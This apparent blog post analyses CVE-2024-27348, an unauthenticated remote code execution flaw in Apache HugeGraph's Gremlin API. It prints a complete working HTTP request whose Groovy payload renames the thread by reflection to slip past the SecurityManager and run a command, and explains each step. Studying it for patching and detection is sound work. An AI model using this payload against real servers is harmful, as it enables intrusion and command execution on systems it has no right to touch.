CVE-2024-27348

白初&2025-05-29 12:44

文章目录

漏洞名称

Apache HugeGraph 远程代码执行漏洞(CVE-2024-27348)

漏洞描述

Apache HugeGraph 是一款快速、高度可扩展的图数据库。它提供了完整的图数据库功能、出色的性能和企业级的可靠性。

HugeGraph 的 Gremlin API 中存在一个远程代码执行漏洞。Gremlin 是一种图遍历语言,可以在 Groovy、Python 和 Java 等多种编程语言中实现。攻击者能够利用 Gremlin API 在未经身份验证的情况下执行基于 Groovy 的 Gremlin 命令,从而执行任意命令。

理论上,Apache HugeGraph 会使用 SecurityManager 来限制用户提交的 Groovy 脚本。但 SecurityManager 仅检查以"gremlin-server-exec"或"task-worker"开头的线程名称。攻击者通过使用反射修改当前线程名称,可以绕过这一机制,从而实现任意代码执行。

漏洞复现

ui:

请求:

复制代码 
POST /gremlin HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 777

{
    "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"id\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());",
    "bindings": {},
    "language": "gremlin-groovy",
    "aliases": {}
}

结果:

漏洞分析

利用 ​​Apache TinkerPop Gremlin Server​​ 的 Groovy 脚本执行能力,绕过沙箱限制执行任意系统命令

修改当前线程名称

java 复制代码 
Thread thread = Thread.currentThread();
Class clz = Class.forName("java.lang.Thread");
java.lang.reflect.Field field = clz.getDeclaredField("name");
field.setAccessible(true);
field.set(thread, "SL7");
  • Class.forName():动态加载类对象。
  • getDeclaredField("name"):获取私有字段 name。
  • setAccessible(true):绕过访问权限检查。
  • field.set():修改线程名称字段值。

反射调用 ProcessBuilder 执行命令​​

java 复制代码 
// 获取 ProcessBuilder 类及构造方法
Class processBuilderClass = Class.forName("java.lang.ProcessBuilder");
java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);

// 构造命令参数列表
java.util.List command = java.util.Arrays.asList("id");

// 实例化 ProcessBuilder 并执行命令
Object processBuilderInstance = constructor.newInstance(command);
java.lang.reflect.Method startMethod = processBuilderClass.getMethod("start");

// 获取命令执行结果
org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());
相关推荐
2301_7806698617 小时前
Set集合、HashSet集合的底层原理
java
你曾经是少年17 小时前
Java 关键字
java
海南java第二人17 小时前
SpringBoot启动流程深度解析:从入口到容器就绪的完整机制
java·开发语言
问今域中17 小时前
Spring Boot 请求参数绑定注解
java·spring boot·后端
星火开发设计17 小时前
C++ queue 全面解析与实战指南
java·开发语言·数据结构·c++·学习·知识·队列
rgeshfgreh17 小时前
Java+GeoTools+PostGIS高效求解对跖点
java
鱼跃鹰飞17 小时前
DDD中的防腐层
java·设计模式·架构
计算机程序设计小李同学17 小时前
婚纱摄影集成管理系统小程序
java·vue.js·spring boot·后端·微信小程序·小程序
yunlong326718 小时前
吊装助理三维结构有限元分析操作教程
安全·有限元·方案·安全分析·吊装·起重·结构计算
栈与堆18 小时前
LeetCode 19 - 删除链表的倒数第N个节点
java·开发语言·数据结构·python·算法·leetcode·链表
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03网站改了域名,如何查找?04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06Claude Code 2.1.2 升级报错?别折腾了,一行命令搞定07【踩坑笔记】50系显卡适配的 PyTorch 安装082025-04-03 Latex学习1——本地配置Latex + VScode环境09KGG转MP3工具|非KGM文件|解密音频10jdk21下载、安装(Windows、Linux、macOS)